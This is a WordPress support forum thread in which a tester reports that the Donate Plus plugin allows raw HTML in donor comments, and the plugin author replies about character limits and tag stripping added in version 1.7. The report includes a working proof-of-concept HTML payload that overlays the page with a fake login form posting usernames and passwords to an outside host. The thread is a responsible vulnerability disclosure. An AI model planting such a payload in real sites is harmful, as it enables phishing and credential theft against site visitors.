[Plugin: Donate Plus] Potentially Malicious HTML allowed in donor comments

  • shalzers

    (@shalzers)


    13 years, 6 months ago

    I was testing this plug-in and found that I was able to embed potentially malicious html in the page that allowed me to take over the screen and overlay whatever content I wanted. Whoops!

    <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height:
1300px; z-index: 1000; background-color:white; padding: 1em;">Welcome to
MyGoat!!1! Please Login wit credentialz for major nigerian cash<br><form
name="login" action="http://aspectsecurity.com"><table><tr><td>Username:
</td><td><input type="text"
name="username"/></td></tr><tr><td>Password:</td><td><input type="text"
name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit"
value="Login"/></td></tr></table></form><img</div>

    http://img.skitch.com/20101024-8dd26w5225tjfxh9x1s21shemx.png

    I inserted this html through the wordpress backend but assume there is no validation to prevent this.

    http://wordpress.org/extend/plugins/donate-plus/

Viewing 1 replies (of 1 total)
  • Plugin Author devbit

    (@devbit)

    12 years, 8 months ago

    The donation form (and PayPal) only allows 199 characters which your code exceeds, so it would be quite difficult to do too much damage, but I’ve taken your concerns to heart and have made sure that the paypal submitted comment also has all tags stripped in version 1.7.

    The admin section is meant for the owner of the site, so it will allow any and all code to be entered into a previously submitted donor wall entry – if you want to hack your own site that is up to you! 🙂

    Thanks for the input!

Viewing 1 replies (of 1 total)
  • The topic ‘[Plugin: Donate Plus] Potentially Malicious HTML allowed in donor comments’ is closed to new replies.